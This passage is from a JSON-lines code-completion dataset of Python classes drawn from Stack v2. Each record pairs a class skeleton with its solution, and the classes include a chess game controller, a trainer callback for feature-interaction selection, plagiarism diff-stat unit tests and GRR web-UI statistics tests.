self.game.over:\n self.runController(RoundController(self.game))\n self.stopRunning()\n<|end_body_1|>\n", "revision_id": "2a54293181c1c2b1a2b840ddee4d4d80177efb33", "skeleton": "<|skeleton|>\nclass GameController:\n \"\"\"Controller for running a game of Chess\"\"\"\n\n def __init__(self, game):\n \"\"\"Initialize the Game Controller\"\"\"\n <|body_0|>\n\n def nextMessage(self, event):\n \"\"\"Tell the screen to print the next message\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class GameController:\n \"\"\"Controller for running a game of Chess\"\"\"\n\n def __init__(self, game):\n \"\"\"Initialize the Game Controller\"\"\"\n self.game = game\n screen = GameScreen()\n ConsoleController.__init__(self, screen, commands={ENDL: self.nextMessage})\n\n def nextMessage(self, event):\n \"\"\"Tell the screen to print the next message\"\"\"\n while not self.game.over:\n self.runController(RoundController(self.game))\n self.stopRunning()\n", "source": "the_stack_v2_python_sparse", "source_path": "data/train/python/12fdeac9f767a584f3dd82dcead3c9177be1a75fgame_controller.py", "source_repo": "harshp8l/deep-learning-lang-detection", "split": "test", "star_events_count": 0} {"blob_id": "da04639a85eacda4fe96f3646033f00cf0c74b84", "bodies": ["super(CtrTrainerCallback, self).__init__()\nself.sieve_board = pd.DataFrame(columns=['selected_feature_pairs', 'score'])\nself.selected_pairs = list()\nlogging.info('init autogate s2 trainer callback')", "super().before_train(logs)\n'Be called before the training process.'\nhpo_result = FileOps.load_pickle(FileOps.join_path(self.trainer.local_output_path, 'best_config.pickle'))\nlogging.info('loading stage1_hpo_result \\n{}'.format(hpo_result))\nfeature_interaction_score = hpo_result['feature_interaction_score']\nprint('feature_interaction_score:', feature_interaction_score)\nsorted_pairs = sorted(feature_interaction_score.items(), key=lambda x: abs(x[1]), reverse=True)\nif ModelConfig.model_desc:\n fis_ratio = ModelConfig.model_desc['custom']['fis_ratio']\nelse:\n fis_ratio = 1.0\ntop_k = int(len(feature_interaction_score) * min(1.0, fis_ratio))\nself.selected_pairs = list(map(lambda x: x[0], sorted_pairs[:top_k]))\nsetattr(ModelConfig.model_desc['custom'], 'selected_pairs', self.selected_pairs)", "curr_auc = float(self.trainer.valid_metrics.results['auc'])\nself.sieve_board = self.sieve_board.append({'selected_feature_pairs': self.selected_pairs, 'score': curr_auc}, ignore_index=True)\nresult_file = FileOps.join_path(self.trainer.local_output_path, '{}_result.csv'.format(self.trainer.__worker_id__))\nself.sieve_board.to_csv(result_file, sep='\\t')"], "bodies_text": "<|body_start_0|>\n super(CtrTrainerCallback, self).__init__()\n self.sieve_board = pd.DataFrame(columns=['selected_feature_pairs', 'score'])\n self.selected_pairs = list()\n logging.info('init autogate s2 trainer callback')\n<|end_body_0|>\n\n<|body_start_1|>\n super().before_train(logs)\n 'Be called before the training process.'\n hpo_result = FileOps.load_pickle(FileOps.join_path(self.trainer.local_output_path, 'best_config.pickle'))\n logging.info('loading stage1_hpo_result \\n{}'.format(hpo_result))\n feature_interaction_score = hpo_result['feature_interaction_score']\n print('feature_interaction_score:', feature_interaction_score)\n sorted_pairs = sorted(feature_interaction_score.items(), key=lambda x: abs(x[1]), reverse=True)\n if ModelConfig.model_desc:\n fis_ratio = 
ModelConfig.model_desc['custom']['fis_ratio']\n else:\n fis_ratio = 1.0\n top_k = int(len(feature_interaction_score) * min(1.0, fis_ratio))\n self.selected_pairs = list(map(lambda x: x[0], sorted_pairs[:top_k]))\n setattr(ModelConfig.model_desc['custom'], 'selected_pairs', self.selected_pairs)\n<|end_body_1|>\n\n<|body_start_2|>\n curr_auc = float(self.trainer.valid_metrics.results['auc'])\n self.sieve_board = self.sieve_board.append({'selected_feature_pairs': self.selected_pairs, 'score': curr_auc}, ignore_index=True)\n result_file = FileOps.join_path(self.trainer.local_output_path, '{}_result.csv'.format(self.trainer.__worker_id__))\n self.sieve_board.to_csv(result_file, sep='\\t')\n<|end_body_2|>\n", "class_docstring": "AutoGateS2TrainerCallback module.", "class_name": "AutoGateS2TrainerCallback", "detected_licenses": ["LicenseRef-scancode-unknown-license-reference", "Apache-2.0", "BSD-3-Clause", "MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AutoGateS2TrainerCallback:\n \"\"\"AutoGateS2TrainerCallback module.\"\"\"\n\n def __init__(self):\n \"\"\"Construct AutoGateS2TrainerCallback class.\"\"\"\n <|body_0|>\n\n def before_train(self, logs=None):\n \"\"\"Call before_train of the managed callbacks.\"\"\"\n <|body_1|>\n\n def after_train(self, logs=None):\n \"\"\"Call after_train of the managed callbacks.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(CtrTrainerCallback, self).__init__()\n self.sieve_board = pd.DataFrame(columns=['selected_feature_pairs', 'score'])\n self.selected_pairs = list()\n logging.info('init autogate s2 trainer callback')\n<|end_body_0|>\n\n<|body_start_1|>\n super().before_train(logs)\n 'Be called before the training process.'\n hpo_result = FileOps.load_pickle(FileOps.join_path(self.trainer.local_output_path, 'best_config.pickle'))\n logging.info('loading stage1_hpo_result \\n{}'.format(hpo_result))\n feature_interaction_score = hpo_result['feature_interaction_score']\n print('feature_interaction_score:', feature_interaction_score)\n sorted_pairs = sorted(feature_interaction_score.items(), key=lambda x: abs(x[1]), reverse=True)\n if ModelConfig.model_desc:\n fis_ratio = ModelConfig.model_desc['custom']['fis_ratio']\n else:\n fis_ratio = 1.0\n top_k = int(len(feature_interaction_score) * min(1.0, fis_ratio))\n self.selected_pairs = list(map(lambda x: x[0], sorted_pairs[:top_k]))\n setattr(ModelConfig.model_desc['custom'], 'selected_pairs', self.selected_pairs)\n<|end_body_1|>\n\n<|body_start_2|>\n curr_auc = float(self.trainer.valid_metrics.results['auc'])\n self.sieve_board = self.sieve_board.append({'selected_feature_pairs': self.selected_pairs, 'score': curr_auc}, ignore_index=True)\n result_file = FileOps.join_path(self.trainer.local_output_path, '{}_result.csv'.format(self.trainer.__worker_id__))\n self.sieve_board.to_csv(result_file, sep='\\t')\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000047", "length_bytes": 3088, "license_type": "permissive", "methods": [{"docstring": "Construct AutoGateS2TrainerCallback class.", "name": "__init__", "signature": "def __init__(self)"}, {"docstring": "Call before_train of the managed callbacks.", "name": "before_train", "signature": "def before_train(self, logs=None)"}, {"docstring": "Call after_train of the managed callbacks.", "name": "after_train", "signature": "def after_train(self, logs=None)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_002034", "prompt": "Implement the Python class 
`AutoGateS2TrainerCallback` described below.\n\nClass description:\nAutoGateS2TrainerCallback module.\n\nMethod signatures and docstrings:\n- def __init__(self): Construct AutoGateS2TrainerCallback class.\n- def before_train(self, logs=None): Call before_train of the managed callbacks.\n- def after_train(self, logs=None): Call after_train of the managed callbacks.", "prompted_full_text": "Implement the Python class `AutoGateS2TrainerCallback` described below.\n\nClass description:\nAutoGateS2TrainerCallback module.\n\nMethod signatures and docstrings:\n- def __init__(self): Construct AutoGateS2TrainerCallback class.\n- def before_train(self, logs=None): Call before_train of the managed callbacks.\n- def after_train(self, logs=None): Call after_train of the managed callbacks.\n\n<|skeleton|>\nclass AutoGateS2TrainerCallback:\n \"\"\"AutoGateS2TrainerCallback module.\"\"\"\n\n def __init__(self):\n \"\"\"Construct AutoGateS2TrainerCallback class.\"\"\"\n <|body_0|>\n\n def before_train(self, logs=None):\n \"\"\"Call before_train of the managed callbacks.\"\"\"\n <|body_1|>\n\n def after_train(self, logs=None):\n \"\"\"Call after_train of the managed callbacks.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(CtrTrainerCallback, self).__init__()\n self.sieve_board = pd.DataFrame(columns=['selected_feature_pairs', 'score'])\n self.selected_pairs = list()\n logging.info('init autogate s2 trainer callback')\n<|end_body_0|>\n\n<|body_start_1|>\n super().before_train(logs)\n 'Be called before the training process.'\n hpo_result = FileOps.load_pickle(FileOps.join_path(self.trainer.local_output_path, 'best_config.pickle'))\n logging.info('loading stage1_hpo_result \\n{}'.format(hpo_result))\n feature_interaction_score = hpo_result['feature_interaction_score']\n print('feature_interaction_score:', feature_interaction_score)\n sorted_pairs = sorted(feature_interaction_score.items(), key=lambda x: abs(x[1]), reverse=True)\n if ModelConfig.model_desc:\n fis_ratio = ModelConfig.model_desc['custom']['fis_ratio']\n else:\n fis_ratio = 1.0\n top_k = int(len(feature_interaction_score) * min(1.0, fis_ratio))\n self.selected_pairs = list(map(lambda x: x[0], sorted_pairs[:top_k]))\n setattr(ModelConfig.model_desc['custom'], 'selected_pairs', self.selected_pairs)\n<|end_body_1|>\n\n<|body_start_2|>\n curr_auc = float(self.trainer.valid_metrics.results['auc'])\n self.sieve_board = self.sieve_board.append({'selected_feature_pairs': self.selected_pairs, 'score': curr_auc}, ignore_index=True)\n result_file = FileOps.join_path(self.trainer.local_output_path, '{}_result.csv'.format(self.trainer.__worker_id__))\n self.sieve_board.to_csv(result_file, sep='\\t')\n<|end_body_2|>\n", "revision_id": "12e37a1991eb6771a2999fe0a46ddda920c47948", "skeleton": "<|skeleton|>\nclass AutoGateS2TrainerCallback:\n \"\"\"AutoGateS2TrainerCallback module.\"\"\"\n\n def __init__(self):\n \"\"\"Construct AutoGateS2TrainerCallback class.\"\"\"\n <|body_0|>\n\n def before_train(self, logs=None):\n \"\"\"Call before_train of the managed callbacks.\"\"\"\n <|body_1|>\n\n def after_train(self, logs=None):\n \"\"\"Call after_train of the managed callbacks.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AutoGateS2TrainerCallback:\n \"\"\"AutoGateS2TrainerCallback module.\"\"\"\n\n def __init__(self):\n \"\"\"Construct AutoGateS2TrainerCallback class.\"\"\"\n super(CtrTrainerCallback, self).__init__()\n 
self.sieve_board = pd.DataFrame(columns=['selected_feature_pairs', 'score'])\n self.selected_pairs = list()\n logging.info('init autogate s2 trainer callback')\n\n def before_train(self, logs=None):\n \"\"\"Call before_train of the managed callbacks.\"\"\"\n super().before_train(logs)\n 'Be called before the training process.'\n hpo_result = FileOps.load_pickle(FileOps.join_path(self.trainer.local_output_path, 'best_config.pickle'))\n logging.info('loading stage1_hpo_result \\n{}'.format(hpo_result))\n feature_interaction_score = hpo_result['feature_interaction_score']\n print('feature_interaction_score:', feature_interaction_score)\n sorted_pairs = sorted(feature_interaction_score.items(), key=lambda x: abs(x[1]), reverse=True)\n if ModelConfig.model_desc:\n fis_ratio = ModelConfig.model_desc['custom']['fis_ratio']\n else:\n fis_ratio = 1.0\n top_k = int(len(feature_interaction_score) * min(1.0, fis_ratio))\n self.selected_pairs = list(map(lambda x: x[0], sorted_pairs[:top_k]))\n setattr(ModelConfig.model_desc['custom'], 'selected_pairs', self.selected_pairs)\n\n def after_train(self, logs=None):\n \"\"\"Call after_train of the managed callbacks.\"\"\"\n curr_auc = float(self.trainer.valid_metrics.results['auc'])\n self.sieve_board = self.sieve_board.append({'selected_feature_pairs': self.selected_pairs, 'score': curr_auc}, ignore_index=True)\n result_file = FileOps.join_path(self.trainer.local_output_path, '{}_result.csv'.format(self.trainer.__worker_id__))\n self.sieve_board.to_csv(result_file, sep='\\t')\n", "source": "the_stack_v2_python_sparse", "source_path": "vega/algorithms/nas/fis/autogate_s2_trainer_callback.py", "source_repo": "huawei-noah/vega", "split": "test", "star_events_count": 850} {"blob_id": "3f5bd9cc4321e2c3a0dc4fc90cd05ca770aead2b", "bodies": ["first_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\nsecond_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'paw'))\nexpected = {'text_plagiarism': 0.875, 'sentence_plagiarism': [1.0, 0.75], 'sentence_lcs_length': [4, 3], 'difference_indexes': [((), ()), ((3, 4), (3, 4))]}\nactual = accumulate_diff_stats(first_text, second_text)\nself.assertEqual(expected, actual)", "expected = {'text_plagiarism': 0.875, 'sentence_plagiarism': [1.0, 0.75], 'sentence_lcs_length': [4, 3], 'difference_indexes': [((), ()), ((3, 4), (3, 4))]}\ntext_first = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\ntext_second = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'paw'))\nactual = accumulate_diff_stats(text_first, text_second)\nself.assertIn('text_plagiarism', actual)\nself.assertIn('sentence_plagiarism', actual)\nself.assertIn('sentence_lcs_length', actual)\nself.assertIn('difference_indexes', actual)\nself.assertEqual(expected['text_plagiarism'], actual['text_plagiarism'])\nself.assertEqual(expected['sentence_plagiarism'], actual['sentence_plagiarism'])\nself.assertEqual(expected['sentence_lcs_length'], actual['sentence_lcs_length'])\nself.assertEqual(expected['difference_indexes'], actual['difference_indexes'])", "patches_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\naccumulate_diff_stats(patches_text, patches_text)\nself.assertTrue(mock.called)", "patches_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\naccumulate_diff_stats(patches_text, patches_text)\nself.assertTrue(mock.called)", "patches_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\naccumulate_diff_stats(patches_text, patches_text)\nself.assertTrue(mock.called)"], "bodies_text": 
"<|body_start_0|>\n first_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n second_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'paw'))\n expected = {'text_plagiarism': 0.875, 'sentence_plagiarism': [1.0, 0.75], 'sentence_lcs_length': [4, 3], 'difference_indexes': [((), ()), ((3, 4), (3, 4))]}\n actual = accumulate_diff_stats(first_text, second_text)\n self.assertEqual(expected, actual)\n<|end_body_0|>\n\n<|body_start_1|>\n expected = {'text_plagiarism': 0.875, 'sentence_plagiarism': [1.0, 0.75], 'sentence_lcs_length': [4, 3], 'difference_indexes': [((), ()), ((3, 4), (3, 4))]}\n text_first = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n text_second = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'paw'))\n actual = accumulate_diff_stats(text_first, text_second)\n self.assertIn('text_plagiarism', actual)\n self.assertIn('sentence_plagiarism', actual)\n self.assertIn('sentence_lcs_length', actual)\n self.assertIn('difference_indexes', actual)\n self.assertEqual(expected['text_plagiarism'], actual['text_plagiarism'])\n self.assertEqual(expected['sentence_plagiarism'], actual['sentence_plagiarism'])\n self.assertEqual(expected['sentence_lcs_length'], actual['sentence_lcs_length'])\n self.assertEqual(expected['difference_indexes'], actual['difference_indexes'])\n<|end_body_1|>\n\n<|body_start_2|>\n patches_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n accumulate_diff_stats(patches_text, patches_text)\n self.assertTrue(mock.called)\n<|end_body_2|>\n\n<|body_start_3|>\n patches_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n accumulate_diff_stats(patches_text, patches_text)\n self.assertTrue(mock.called)\n<|end_body_3|>\n\n<|body_start_4|>\n patches_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n accumulate_diff_stats(patches_text, patches_text)\n self.assertTrue(mock.called)\n<|end_body_4|>\n", "class_docstring": "Checks for accumulate_diff_stats function", "class_name": "AccumulateDiffStatsTest", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AccumulateDiffStatsTest:\n \"\"\"Checks for accumulate_diff_stats function\"\"\"\n\n def test_accumulate_diff_stats_ideal(self):\n \"\"\"Tests that accumulate_diff_stats function can handle simple ideal input\"\"\"\n <|body_0|>\n\n def test_accumulate_diff_stats_check_output(self):\n \"\"\"Tests that accumulate_diff_stats function can generate correct correct output according to given specs\"\"\"\n <|body_1|>\n\n def test_accumulate_diff_stats_calls_required_function(self, mock):\n \"\"\"Tests that accumulate_diff_stats function can call required function\"\"\"\n <|body_2|>\n\n def test_accumulate_diff_stats_calls_second_required_function(self, mock):\n \"\"\"Tests that accumulate_diff_stats function can call required function\"\"\"\n <|body_3|>\n\n def test_accumulate_diff_stats_calls_third_required_function(self, mock):\n \"\"\"Tests that accumulate_diff_stats function can call required function\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n first_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n second_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'paw'))\n expected = {'text_plagiarism': 0.875, 'sentence_plagiarism': [1.0, 0.75], 'sentence_lcs_length': [4, 3], 'difference_indexes': [((), ()), ((3, 4), (3, 4))]}\n actual = accumulate_diff_stats(first_text, second_text)\n self.assertEqual(expected, 
actual)\n<|end_body_0|>\n\n<|body_start_1|>\n expected = {'text_plagiarism': 0.875, 'sentence_plagiarism': [1.0, 0.75], 'sentence_lcs_length': [4, 3], 'difference_indexes': [((), ()), ((3, 4), (3, 4))]}\n text_first = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n text_second = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'paw'))\n actual = accumulate_diff_stats(text_first, text_second)\n self.assertIn('text_plagiarism', actual)\n self.assertIn('sentence_plagiarism', actual)\n self.assertIn('sentence_lcs_length', actual)\n self.assertIn('difference_indexes', actual)\n self.assertEqual(expected['text_plagiarism'], actual['text_plagiarism'])\n self.assertEqual(expected['sentence_plagiarism'], actual['sentence_plagiarism'])\n self.assertEqual(expected['sentence_lcs_length'], actual['sentence_lcs_length'])\n self.assertEqual(expected['difference_indexes'], actual['difference_indexes'])\n<|end_body_1|>\n\n<|body_start_2|>\n patches_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n accumulate_diff_stats(patches_text, patches_text)\n self.assertTrue(mock.called)\n<|end_body_2|>\n\n<|body_start_3|>\n patches_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n accumulate_diff_stats(patches_text, patches_text)\n self.assertTrue(mock.called)\n<|end_body_3|>\n\n<|body_start_4|>\n patches_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n accumulate_diff_stats(patches_text, patches_text)\n self.assertTrue(mock.called)\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000048", "length_bytes": 3701, "license_type": "permissive", "methods": [{"docstring": "Tests that accumulate_diff_stats function can handle simple ideal input", "name": "test_accumulate_diff_stats_ideal", "signature": "def test_accumulate_diff_stats_ideal(self)"}, {"docstring": "Tests that accumulate_diff_stats function can generate correct correct output according to given specs", "name": "test_accumulate_diff_stats_check_output", "signature": "def test_accumulate_diff_stats_check_output(self)"}, {"docstring": "Tests that accumulate_diff_stats function can call required function", "name": "test_accumulate_diff_stats_calls_required_function", "signature": "def test_accumulate_diff_stats_calls_required_function(self, mock)"}, {"docstring": "Tests that accumulate_diff_stats function can call required function", "name": "test_accumulate_diff_stats_calls_second_required_function", "signature": "def test_accumulate_diff_stats_calls_second_required_function(self, mock)"}, {"docstring": "Tests that accumulate_diff_stats function can call required function", "name": "test_accumulate_diff_stats_calls_third_required_function", "signature": "def test_accumulate_diff_stats_calls_third_required_function(self, mock)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_000907", "prompt": "Implement the Python class `AccumulateDiffStatsTest` described below.\n\nClass description:\nChecks for accumulate_diff_stats function\n\nMethod signatures and docstrings:\n- def test_accumulate_diff_stats_ideal(self): Tests that accumulate_diff_stats function can handle simple ideal input\n- def test_accumulate_diff_stats_check_output(self): Tests that accumulate_diff_stats function can generate correct correct output according to given specs\n- def test_accumulate_diff_stats_calls_required_function(self, mock): Tests that accumulate_diff_stats function can call required function\n- def test_accumulate_diff_stats_calls_second_required_function(self, mock): Tests that 
accumulate_diff_stats function can call required function\n- def test_accumulate_diff_stats_calls_third_required_function(self, mock): Tests that accumulate_diff_stats function can call required function", "prompted_full_text": "Implement the Python class `AccumulateDiffStatsTest` described below.\n\nClass description:\nChecks for accumulate_diff_stats function\n\nMethod signatures and docstrings:\n- def test_accumulate_diff_stats_ideal(self): Tests that accumulate_diff_stats function can handle simple ideal input\n- def test_accumulate_diff_stats_check_output(self): Tests that accumulate_diff_stats function can generate correct correct output according to given specs\n- def test_accumulate_diff_stats_calls_required_function(self, mock): Tests that accumulate_diff_stats function can call required function\n- def test_accumulate_diff_stats_calls_second_required_function(self, mock): Tests that accumulate_diff_stats function can call required function\n- def test_accumulate_diff_stats_calls_third_required_function(self, mock): Tests that accumulate_diff_stats function can call required function\n\n<|skeleton|>\nclass AccumulateDiffStatsTest:\n \"\"\"Checks for accumulate_diff_stats function\"\"\"\n\n def test_accumulate_diff_stats_ideal(self):\n \"\"\"Tests that accumulate_diff_stats function can handle simple ideal input\"\"\"\n <|body_0|>\n\n def test_accumulate_diff_stats_check_output(self):\n \"\"\"Tests that accumulate_diff_stats function can generate correct correct output according to given specs\"\"\"\n <|body_1|>\n\n def test_accumulate_diff_stats_calls_required_function(self, mock):\n \"\"\"Tests that accumulate_diff_stats function can call required function\"\"\"\n <|body_2|>\n\n def test_accumulate_diff_stats_calls_second_required_function(self, mock):\n \"\"\"Tests that accumulate_diff_stats function can call required function\"\"\"\n <|body_3|>\n\n def test_accumulate_diff_stats_calls_third_required_function(self, mock):\n \"\"\"Tests that accumulate_diff_stats function can call required function\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n first_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n second_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'paw'))\n expected = {'text_plagiarism': 0.875, 'sentence_plagiarism': [1.0, 0.75], 'sentence_lcs_length': [4, 3], 'difference_indexes': [((), ()), ((3, 4), (3, 4))]}\n actual = accumulate_diff_stats(first_text, second_text)\n self.assertEqual(expected, actual)\n<|end_body_0|>\n\n<|body_start_1|>\n expected = {'text_plagiarism': 0.875, 'sentence_plagiarism': [1.0, 0.75], 'sentence_lcs_length': [4, 3], 'difference_indexes': [((), ()), ((3, 4), (3, 4))]}\n text_first = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n text_second = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'paw'))\n actual = accumulate_diff_stats(text_first, text_second)\n self.assertIn('text_plagiarism', actual)\n self.assertIn('sentence_plagiarism', actual)\n self.assertIn('sentence_lcs_length', actual)\n self.assertIn('difference_indexes', actual)\n self.assertEqual(expected['text_plagiarism'], actual['text_plagiarism'])\n self.assertEqual(expected['sentence_plagiarism'], actual['sentence_plagiarism'])\n self.assertEqual(expected['sentence_lcs_length'], actual['sentence_lcs_length'])\n self.assertEqual(expected['difference_indexes'], actual['difference_indexes'])\n<|end_body_1|>\n\n<|body_start_2|>\n patches_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n 
accumulate_diff_stats(patches_text, patches_text)\n self.assertTrue(mock.called)\n<|end_body_2|>\n\n<|body_start_3|>\n patches_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n accumulate_diff_stats(patches_text, patches_text)\n self.assertTrue(mock.called)\n<|end_body_3|>\n\n<|body_start_4|>\n patches_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n accumulate_diff_stats(patches_text, patches_text)\n self.assertTrue(mock.called)\n<|end_body_4|>\n", "revision_id": "ada4bec878dd1cbc19058cb4e87893946ae21498", "skeleton": "<|skeleton|>\nclass AccumulateDiffStatsTest:\n \"\"\"Checks for accumulate_diff_stats function\"\"\"\n\n def test_accumulate_diff_stats_ideal(self):\n \"\"\"Tests that accumulate_diff_stats function can handle simple ideal input\"\"\"\n <|body_0|>\n\n def test_accumulate_diff_stats_check_output(self):\n \"\"\"Tests that accumulate_diff_stats function can generate correct correct output according to given specs\"\"\"\n <|body_1|>\n\n def test_accumulate_diff_stats_calls_required_function(self, mock):\n \"\"\"Tests that accumulate_diff_stats function can call required function\"\"\"\n <|body_2|>\n\n def test_accumulate_diff_stats_calls_second_required_function(self, mock):\n \"\"\"Tests that accumulate_diff_stats function can call required function\"\"\"\n <|body_3|>\n\n def test_accumulate_diff_stats_calls_third_required_function(self, mock):\n \"\"\"Tests that accumulate_diff_stats function can call required function\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AccumulateDiffStatsTest:\n \"\"\"Checks for accumulate_diff_stats function\"\"\"\n\n def test_accumulate_diff_stats_ideal(self):\n \"\"\"Tests that accumulate_diff_stats function can handle simple ideal input\"\"\"\n first_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n second_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'paw'))\n expected = {'text_plagiarism': 0.875, 'sentence_plagiarism': [1.0, 0.75], 'sentence_lcs_length': [4, 3], 'difference_indexes': [((), ()), ((3, 4), (3, 4))]}\n actual = accumulate_diff_stats(first_text, second_text)\n self.assertEqual(expected, actual)\n\n def test_accumulate_diff_stats_check_output(self):\n \"\"\"Tests that accumulate_diff_stats function can generate correct correct output according to given specs\"\"\"\n expected = {'text_plagiarism': 0.875, 'sentence_plagiarism': [1.0, 0.75], 'sentence_lcs_length': [4, 3], 'difference_indexes': [((), ()), ((3, 4), (3, 4))]}\n text_first = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n text_second = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'paw'))\n actual = accumulate_diff_stats(text_first, text_second)\n self.assertIn('text_plagiarism', actual)\n self.assertIn('sentence_plagiarism', actual)\n self.assertIn('sentence_lcs_length', actual)\n self.assertIn('difference_indexes', actual)\n self.assertEqual(expected['text_plagiarism'], actual['text_plagiarism'])\n self.assertEqual(expected['sentence_plagiarism'], actual['sentence_plagiarism'])\n self.assertEqual(expected['sentence_lcs_length'], actual['sentence_lcs_length'])\n self.assertEqual(expected['difference_indexes'], actual['difference_indexes'])\n\n def test_accumulate_diff_stats_calls_required_function(self, mock):\n \"\"\"Tests that accumulate_diff_stats function can call required function\"\"\"\n patches_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 
'bruno'))\n accumulate_diff_stats(patches_text, patches_text)\n self.assertTrue(mock.called)\n\n def test_accumulate_diff_stats_calls_second_required_function(self, mock):\n \"\"\"Tests that accumulate_diff_stats function can call required function\"\"\"\n patches_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n accumulate_diff_stats(patches_text, patches_text)\n self.assertTrue(mock.called)\n\n def test_accumulate_diff_stats_calls_third_required_function(self, mock):\n \"\"\"Tests that accumulate_diff_stats function can call required function\"\"\"\n patches_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n accumulate_diff_stats(patches_text, patches_text)\n self.assertTrue(mock.called)\n", "source": "the_stack_v2_python_sparse", "source_path": "lab_2/accumulate_diff_stats_test.py", "source_repo": "WhiteJaeger/2020-2-level-labs", "split": "test", "star_events_count": 0} {"blob_id": "aa6e36ac8681973a3dd671df0794440d6671ea5c", "bodies": ["token = access_control.ACLToken(username='test', reason='fixture')\nwith aff4.FACTORY.Create('aff4:/stats/ClientFleetStats', 'ClientFleetStats', token=token) as fd:\n now = 1321057655\n for i in range(10, 15):\n histogram = fd.Schema.OS_HISTOGRAM(age=int((now + i * 60 * 60 * 24) * 1000000.0))\n for number in [1, 7, 14, 30]:\n graph = rdfvalue.Graph(title='%s day actives' % number)\n graph.Append(label='Windows', y_value=i + number)\n graph.Append(label='Linux', y_value=i * 2 + number)\n histogram.Append(graph)\n fd.AddAttribute(histogram)", "self.Open('/')\nself.WaitUntil(self.IsElementPresent, 'client_query')\nself.assert_(not self.IsElementPresent('css=a[grrtarget=ReadOnlyForemanRuleTable]'))\nwith self.ACLChecksDisabled():\n self.CreateAdminUser('test')\nself.Open('/')\nself.WaitUntil(self.IsElementPresent, 'client_query')\nself.WaitUntil(self.IsElementPresent, 'css=a[grrtarget=ReadOnlyForemanRuleTable]')\nself.Click(\"css=a:contains('Statistics')\")\nself.Click('css=#_Clients ins.jstree-icon')\nself.Click('css=#_Clients-OS_20Breakdown ins.jstree-icon')\nself.WaitUntil(self.IsElementPresent, 'css=#_Clients-OS_20Breakdown-_207_20Day_20Active')\nself.Click(\"css=li[path='/Clients/OS Breakdown/ 7 Day Active'] a\")\nself.WaitUntilEqual(u'No data Available', self.GetText, 'css=#main_rightPane h3')\nwith self.ACLChecksDisabled():\n self.PopulateData()\nself.Click(\"css=li[path='/Clients/OS Breakdown/ 7 Day Active'] a\")\nself.WaitUntilEqual(u'Operating system break down.', self.GetText, 'css=#main_rightPane h3')"], "bodies_text": "<|body_start_0|>\n token = access_control.ACLToken(username='test', reason='fixture')\n with aff4.FACTORY.Create('aff4:/stats/ClientFleetStats', 'ClientFleetStats', token=token) as fd:\n now = 1321057655\n for i in range(10, 15):\n histogram = fd.Schema.OS_HISTOGRAM(age=int((now + i * 60 * 60 * 24) * 1000000.0))\n for number in [1, 7, 14, 30]:\n graph = rdfvalue.Graph(title='%s day actives' % number)\n graph.Append(label='Windows', y_value=i + number)\n graph.Append(label='Linux', y_value=i * 2 + number)\n histogram.Append(graph)\n fd.AddAttribute(histogram)\n<|end_body_0|>\n\n<|body_start_1|>\n self.Open('/')\n self.WaitUntil(self.IsElementPresent, 'client_query')\n self.assert_(not 